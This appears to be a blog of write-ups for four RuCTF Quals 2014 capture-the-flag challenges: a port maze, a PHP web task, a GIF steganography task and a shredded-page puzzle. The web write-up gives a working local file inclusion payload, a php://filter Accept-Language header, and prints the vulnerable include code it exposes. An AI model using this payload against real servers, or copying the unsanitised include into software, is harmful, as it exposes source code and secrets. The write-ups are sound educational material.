Thursday, March 13, 2014

RuCTF Quals 2014 PPC 200 - Maze

We're given a hint (Universal dangerous positive) along with an IP (194.226.244.125) and a port (1024) to connect to.  They also gave us a password to connect:



We assumed it was UDP because of the hint.  Every time we attempted to use netcat UDP, however, it would not respond.  We just thought it was down, until eventually it connected once I decided try to connect using python instead.  I'm assuming that netcat didn't work because it was also sending the newline character with the sent password, so it would not authorize.

When you first connect, you are are told which directions you can go in the maze, which are other ports on the box.  The passwords for those directions are also given.



When you connect to any other port, however, you are not given the port number.  So, I guessed that the distance between the starting ports was the same for that entire specified direction and that it was the reverse distance for the opposite directions.

I wrote a script in python to reach each found port. The script can be found here.

The script to a awhile to run (~1 hour), since the maze was almost 256 by 256.  The port that contained the key was port 65534.  When I first say my script printed the response, I was confused because I didn't remember adding any printing.  Then I realized it was the key...



The key was RUCTF_77pd9u784g059t0z18hjtn5d

Wednesday, March 12, 2014

RuCTF Quals 2014 Web 100 - php

For this one, they give us a link to a website and tell us to find the key.

When you visit the site, you're greeted with the english or russian version of the Capture the Flag entry in Wikipedia:



From the hint, "Language was detect automatically", we figured we had to modify the Accept-Language header to obtain the key.

After several attempts, we found out that we have the page echo back any page we want, however, it will attempt to run any PHP code.  When we tried to have it echo back index.php, it would attempt to load the file infinitely because the file itself is attempting to echo itself:
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<!doctype html>
...

After recalling some knowledge of PHP, I remember about the IO streams that you can call, such as php://stdout or php://stdin.

After some googling, I discovered the filter stream.  The filter stream can be used to read from a file, not only in its ASCII representation, but in several available formats.  We then decided to open index.php encoded in base64:

Accept-Language: php://filter/convert.base64-encode/resource=index.php


This worked and returned to us with the base64 encoding of index.php:

PCFkb2N0eXBlIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgogICAgcHJlIHsgd2lkdGg6IDY0MHB4OyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB0ZXh0LWFsaWduOiBqdXN0aWZ5O307CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGNlbnRlcj4KPGgyPkNURjwvaDI+Cjw/cGhwCiAgaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwogICRmbGFnID0gJzVjZjI3ZDliYWQyZmU5ZDk2ZDJiY2YyNWMzYjBiZDE0JzsKICAkb2sgICA9IDA7CiAgZm9yZWFjaChleHBsb2RlKCcsJywgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRzKSB7CiAgICAkbCA9IGV4cGxvZGUoJzsnLCAkcylbMF07CiAgICBpZiAoaW5jbHVkZSAkbCkgewogICAgICAkb2sgPSAxOwogICAgICBicmVhazsKICAgIH0KICB9CiAgaWYgKCEkb2spIHsKICAgIGluY2x1ZGUgJ2VuJzsKICAgIGVjaG8gJ0xhbmd1YWdlIHdhcyBub3QgZGV0ZWN0IGF1dG9tYXRpY2FsbHkgOignOwogIH0gZWxzZSB7CiAgICBlY2hvICdMYW5ndWFnZSB3YXMgZGV0ZWN0IGF1dG9tYXRpY2FsbHkgOiknOwogIH0KPz4KPGNlbnRlcj4KPC9ib2R5Pgo8L2h0bWw+Cg==


This converts to:
<!doctype html>
<html>
<head>
  <style type="text/css">
    pre { width: 640px; white-space: normal; text-align: justify;};
  </style>
</head>
<body>
<center>
<h2>CTF</h2>
<?php
  header('Content-Type: text/html; charset=utf-8');
  $flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';
  $ok   = 0;
  foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $s) {
    $l = explode(';', $s)[0];
    if (include $l) {
      $ok = 1;
      break;
    }
  }
  if (!$ok) {
    include 'en';
    echo 'Language was not detect automatically :(';
  } else {
    echo 'Language was detect automatically :)';
  }
?>
<center>
</body>
</html>

The flag was 5cf27d9bad2fe9d96d2bcf25c3b0bd14

Tuesday, March 11, 2014

RuCTF Quals 2014 Stegano 100 - Cat's eye

We're given a tiny gif image for this challenge:







So, first things first, I opened the image using StegSolve.  I saved all 8 frames using the frame browser. I then wrote a python script (using PIL) that XOR'd the images pixel with each other.  The output was an image that looked similar to this:







I couldn't find any hidden data within the pixels of the image.  I then realized that the frames were using palettes, so the mode for the image in python was labeled as 'P'.  I decided to convert each one of the frames to mode 'RGBA' instead, because, originally, when I would get a pixel, it return a single value.  This way, I could then XOR each red, green, blue, and alpha value of each frame with each other.

I then modified my current script to XOR each of these 'RGBA' mode frames with each other.

I never checked the alpha channel previously or if the image originally had an alpha channel.  So, naturally I then found that there was no difference in the new images alpha channels.  I then set all alpha channel values to 255, so I could visually see the image (the XOR results were 0 since there was no difference between the images.)

I also noticed how some red pixels of the newly created XOR'd image were not all 0.  I then set any red pixel value that was not 0 to 255 so I could easily view a hidden image if there was one. The resulting image was this:







I immediately though that there was some sort of hidden text within those pixel values that were set.  So, I open the image in StegSolve.  I checked the red channel for steganography and found the key:




























 The key is  RUCTF_e4dd9f5cee307b322c3a27abe66e3df9


Source code for my script can be found here.

RuCTF Quals 2014 Misc 100 - Shredder

For this challenge, we're given an image of a shredded document:



Soon after, we discovered that the original paper document was a print screen of an email within GMail.  We eventually decided it would be easiest to print out the image and physically put the pieces back together.

Using our terrible school printing system, we eventually managed to print the image.  Alas, the image that was printed only contained about 3/4ths of the original image. 

So, I then put what pieces I had cut up together and looked at the original image for pieces I did not have. 


I ended up numbering the pieces of paper that contained the key, which eventually resulted in finding the actual key:


 Key is  RUCTF_TO_SHRED_IS_NOT_ENOUGH